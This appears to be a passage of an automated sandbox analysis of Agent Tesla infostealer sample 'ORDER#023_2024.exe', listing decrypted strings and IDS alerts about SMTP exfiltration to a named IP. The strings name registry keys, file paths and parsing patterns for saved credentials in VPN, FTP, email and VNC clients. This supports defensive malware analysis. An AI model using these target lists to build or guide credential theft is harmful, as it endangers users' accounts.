                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Psi\profiles
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Psi+\profiles
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \accounts.xml
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \accounts.xml
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: OpenVPN
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: username
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: auth-data
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: entropy
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: USERPROFILE
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \OpenVPN\config\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: remote
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: remote
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: NordVpn.exe*
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: user.config
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: //setting[@name='Username']/value
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: //setting[@name='Password']/value
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: NordVPN
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Private Internet Access
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: %ProgramW6432%
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Private Internet Access\data
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Private Internet Access\data
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \account.json
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: .*"username":"(.*?)"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: .*"password":"(.*?)"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Private Internet Access
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: privateinternetaccess.com
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FileZilla
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Server>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Host>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Host>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </Host>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Port>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </Port>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <User>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <User>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </User>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </Pass>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Pass>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </Pass>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: CoreFTP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: User
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Host
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Port
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: WinSCP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HostName
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UserName
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PublicKeyFile
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PortNumber
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: WinSCP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ABCDEF
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Flash FXP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: port
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: user
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pass
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: quick.dat
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Sites.dat
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \FlashFXP\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \FlashFXP\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FTP Navigator
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: No Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: User
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmartFTP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: APPDATA
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: WS_FTP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HOST
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PWD=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PWD=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FtpCommander
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SystemDrive
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;Password=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;User=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;Server=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;Port=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;Port=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;Password=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;User=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ;Anonymous=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FTPGetter
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_ip>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_ip>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </server_ip>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_port>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </server_port>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_user_name>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_user_name>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </server_user_name>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_user_password>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: <server_user_password>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: </server_user_password>
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FTPGetter
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: The Bat!
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \The Bat!
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Account.CFN
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Account.CFN
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Becky!
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: DataDir
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Folder.lst
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Mailbox.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Account
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PassWd
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Account
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SMTPServer
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Account
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: MailAddress
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Becky!
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Outlook
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IMAP Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: POP3 Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HTTP Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SMTP Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IMAP Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: POP3 Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HTTP Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SMTP Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Windows Mail App
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SchemaId
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pResourceElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pIdentityElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pPackageSid
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: syncpassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: mailoutgoing
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FoxMail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Executable
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: FoxmailPath
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Storage\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Storage\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Accounts\Account.rec0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Accounts\Account.rec0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Account.stg
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Account.stg
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: POP3Host
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SMTPHost
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: IncomingServer
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Account
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: MailAddress
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: POP3Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Opera Mail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: opera:
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PocoMail
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: appdata
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: POPPass
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SMTPPass
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SMTP
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: eM Client
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: eM Client\accounts.dat
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: eM Client
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Accounts
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: "Username":"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: "Secret":"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: "ProviderName":"
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: o6806642kbM7c5
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Mailbird
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SenderIdentities
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Accounts
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Server_Host
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Accounts
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Email
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Username
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: EncryptedPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Mailbird
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: RealVNC 4.x
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: RealVNC 3.x
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: RealVNC 4.x
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: RealVNC 3.x
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: TightVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: TightVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: PasswordViewOnly
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: TightVNC ControlPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\TightVNC\Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ControlPassword
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: TigerVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\TigerVNC\Server
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Password
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: UltraVNC
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: passwd2
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: JDownloader 2.0
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: JDownloader 2.0\cfg
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Paltalk
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                        Source: 5.2.ORDER#023_2024.exe.400000.0.unpackString decryptor: nickname
                        Source: ORDER#023_2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: ORDER#023_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 4x nop then jmp 06F58DEFh0_2_06F583B4
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 4x nop then jmp 06F58DEFh0_2_06F586B6
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 4x nop then jmp 06F58DEFh0_2_06F584EE
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeCode function: 4x nop then jmp 06F58DEFh0_2_06F58579

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
